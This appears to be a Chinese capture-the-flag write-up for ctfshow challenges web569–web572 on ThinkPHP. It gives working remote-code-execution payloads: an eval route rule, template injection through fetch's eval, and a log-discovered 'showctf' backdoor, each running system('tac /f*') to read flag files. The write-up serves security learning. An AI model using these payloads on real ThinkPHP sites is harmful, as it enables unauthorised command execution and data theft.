目录

①web569

②web570

③web571

④web572

---

①web569

 基础考察

/index.php/Admin/Login/ctfshowLogin

②web570

提示找路由

查看附件源码 (config.php)

发现定义了一个可执行命令的路由规则

/index.php/ctfshow/assert/eval($_POST[1])

1=system('tac /f*'); 

③web571

提示控制器 

查看源码（IndexController.class.php）

传了参数$n

 

调用了show方法

跟进

调用了display

继续跟

跟进fetch

在fetch方法中执行了eval('?>'.$_content);，而$content的值是可控的

payload:

/index.php/home/index/index?n=<?=system('tac /f*');?> 

④web572

题目提示要爆破，而且不超过365次 (1年的天数)

ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志，而且debug很多站都没关，其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log

bp爆破

 

访问/Application/Runtime/Logs/Home/21_04_15.log 

得到附件

[ 2021-04-15T14:49:32+08:00 ] 127.0.0.1 /index.php?showctf=%3C?php%20phpinfo();?%3E
INFO: [ app_init ] --START--
INFO: Run Behavior\BuildLiteBehavior [ RunTime:0.000039s ]
INFO: [ app_init ] --END-- [ RunTime:0.000738s ]
INFO: [ app_begin ] --START--
INFO: Run Behavior\ReadHtmlCacheBehavior [ RunTime:0.000712s ]
INFO: [ app_begin ] --END-- [ RunTime:0.000868s ]
INFO: [ view_parse ] --START--
INFO: [ template_filter ] --START--
INFO: Run Behavior\ContentReplaceBehavior [ RunTime:0.000071s ]
INFO: [ template_filter ] --END-- [ RunTime:0.000204s ]
INFO: Run Behavior\ParseTemplateBehavior [ RunTime:0.008833s ]
INFO: [ view_parse ] --END-- [ RunTime:0.009135s ]
INFO: [ view_filter ] --START--
INFO: Run Behavior\WriteHtmlCacheBehavior [ RunTime:0.000468s ]
INFO: [ view_filter ] --END-- [ RunTime:0.000591s ]
INFO: [ app_end ] --START--
INFO: Run Behavior\ShowPageTraceBehavior [ RunTime:0.000964s ]
INFO: [ app_end ] --END-- [ RunTime:0.001181s ]

发现任意命令执行后门：/index.php?showctf=

payload:

/index.php?showctf=<?= system('tac /f*')?>